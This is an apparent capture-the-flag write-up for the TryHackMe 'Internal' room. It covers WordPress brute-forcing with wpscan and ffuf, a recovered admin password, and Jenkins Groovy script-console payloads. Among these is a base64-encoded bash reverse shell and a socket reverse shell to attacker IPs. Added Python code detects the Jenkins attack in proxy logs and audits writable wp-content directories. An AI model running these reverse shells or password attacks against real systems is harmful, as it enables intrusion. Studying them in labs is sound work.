internal

https://tryhackme.com/room/internal


Last updated 3 years ago


- http://internal.thm/phpmyadmin/
- http://internal.thm/blog/wp-login.php

- WordPress 5.4.2. Users are enumerable through the REST API: http://internal.thm/blog/index.php/wp-json/wp/v2/users/

```bash
# enumerate vulnerable plugins/themes and users 1-50
wpscan --url http://internal.thm/blog/ -o wps.txt -e vp,vt,u1-50
# password attack against the admin user via wp-login.php
wpscan --url http://internal.thm/blog/ -U admin -P ../rockyou.txt -t 50 --password-attack wp-login
```

admin:my2boys

```bash
python3 xmlrpc-bruteforcer.py -u admin -w ../rockyou.txt -x http://internal.thm/blog/xmlrpc.php
```

- phpMyAdmin v4.6.6 default creds - `root:<blank>`

william:[redacted]

aubreanna:[redacted]

• Inside a Docker container? `cat /proc/self/cgroup`

Jenkins 2.250

```bash
# expose the Jenkins container (172.17.0.2:8080) on the host's port 9700
./socat TCP-LISTEN:9700,fork TCP:172.17.0.2:8080
```

```bash
# raw request file (rr) with UN/PW placeholders; filter out responses mentioning loginError
ffuf -X POST -request rr -u http://10.10.47.108:9700/j_acegi_security_check -w ../userlist.txt:UN -w ../passwordlist.txt:PW -fr loginError -s

# single user, password list only
ffuf -X POST -u http://10.10.47.108:9700/j_acegi_security_check -d "j_username=admin&j_password=FUZZ&from=%2F&Submit=Sign+in" -w pwdl -fr loginError -H 'Content-Type: application/x-www-form-urlencoded'
```

• Groovy script RCE in Jenkins - `<url>/script`

#1

```groovy
// run a single command and echo its stdout/stderr back in the console
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '<cmd>'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```

#2

```groovy
// same as #1, but the command is a base64-encoded bash reverse shell
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNC4xNy4xNjkvNzkwMiAwPiYxJwo=}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```

#3 (swap `cmd` for `cmd.exe` on Windows)

```groovy
String host = "10.17.14.169";
int port = 7902;
String cmd = "/bin/bash";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
};
p.destroy();
s.close();
```
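The two Jenkins steps above (password attack on `j_acegi_security_check`, then the script console) are both loud in the access log of whatever sits in front of Jenkins. The following is an added detection example, not part of the original writeup; it assumes a reverse proxy writing standard combined-format access logs, and the log lines, IPs and threshold are constructed for the demo:

```python
import re
from collections import Counter

# Combined/common access-log format as written by nginx or Apache in front of
# Jenkins (assumption: Jenkins itself writes no access log by default).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

LOGIN_PATH = "/j_acegi_security_check"       # Jenkins form-login endpoint
CONSOLE_PATHS = ("/script", "/scriptText")   # Groovy script console endpoints


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop query string
    return rec


def analyse(lines, login_threshold=10):
    """Return (login_sources, console_hits).

    login_sources: {ip: count} of POSTs to the login endpoint, keeping only
    sources at or above login_threshold (a brute-force / spraying signal).
    console_hits: (ip, method, path, status) for every request to the script
    console, which ordinary users have no reason to touch.
    """
    login_counts = Counter()
    console_hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            login_counts[rec["ip"]] += 1
        if rec["path"] in CONSOLE_PATHS:
            console_hits.append((rec["ip"], rec["method"], rec["path"], rec["status"]))
    login_sources = {ip: n for ip, n in login_counts.items() if n >= login_threshold}
    return login_sources, console_hits


# Constructed sample log: 12 rapid login POSTs from one source, one normal
# login from another, then the noisy source hitting the script console.
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Jan/2024:10:00:{s:02d} +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0'
    for s in range(12)
] + [
    '10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /login HTTP/1.1" 200 4312',
    '10.0.0.7 - - [01/Jan/2024:10:01:05 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0',
    '10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "POST /script HTTP/1.1" 200 1771',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    sources, hits = analyse(SAMPLE_LOG)
    for ip, n in sources.items():
        print(f"[!] {n} login POSTs from {ip}")
    for ip, method, path, status in hits:
        print(f"[!] script console access: {ip} {method} {path} -> {status}")
```

On a real deployment the threshold would be applied per time window rather than over the whole file, and the console rule is best paired with Jenkins' own audit-trail plugin, since the proxy log shows that `/script` was posted to but not which Groovy ran.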

root:[redacted]

Login form body posted to `j_acegi_security_check`:

```
j_username=test&j_password=test&from=%2F&Submit=Sign+in
```

PoC:

- xmlrpc system.multicall doesn't work
- login as admin into wp
- wp-login.php bruteforce
- upload malicious plugin for RCE - the plugin directory isn't writable
- theme directory is writable, uploaded shell
- jenkins running in a docker container
- mapped jenkins docker ip:port to machine ip:port using socat
- lets try bf'ing jenkins login
- injected reverse shell script in groovy
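The plugin-vs-theme detail above is a permissions finding: the web server user could write to `wp-content/themes` but not `wp-content/plugins`. The audit below is an added example, not from the original writeup, that reports which `wp-content` directories a given uid can write to from the mode bits alone (so it can be run as root against the `www-data` uid); the temp-directory layout, modes and probe uid in `demo()` are constructed:

```python
import os
import shutil
import stat
import tempfile


def writable_by(path, uid, gids):
    """True if a user with numeric uid and group set gids can write `path`,
    judged from ownership and mode bits rather than os.access(), so the
    answer is for that user and not for whoever runs the script."""
    st = os.lstat(path)
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def audit_wp_content(wp_root, uid, gids, watched=("plugins", "themes", "uploads")):
    """Return {name: writable} for each watched wp-content subdirectory that
    exists. A writable plugins/themes dir is where an admin session (stolen
    or brute-forced, as in this room) can land PHP; DISALLOW_FILE_MODS plus
    read-only code directories closes that path."""
    base = os.path.join(wp_root, "wp-content")
    return {
        name: writable_by(os.path.join(base, name), uid, gids)
        for name in watched
        if os.path.isdir(os.path.join(base, name))
    }


def demo():
    """Constructed tree: plugins 0755, themes 0777, no uploads directory,
    audited for a probe uid that owns nothing in it."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    try:
        plugins = os.path.join(root, "wp-content", "plugins")
        themes = os.path.join(root, "wp-content", "themes")
        os.makedirs(plugins)
        os.makedirs(themes)
        os.chmod(plugins, 0o755)
        os.chmod(themes, 0o777)
        probe_uid = os.getuid() + 1000   # constructed: any uid that is not ours
        return audit_wp_content(root, probe_uid, set())
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, writable in demo().items():
        print(f"wp-content/{name}: {'WRITABLE' if writable else 'read-only'}")
```

Against a real install, call `audit_wp_content("/var/www/html", pwd.getpwnam("www-data").pw_uid, {grp.getgrnam("www-data").gr_gid})`; ACLs and mount options (`ro`, `noexec`) are not reflected in the mode bits and need a separate check.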
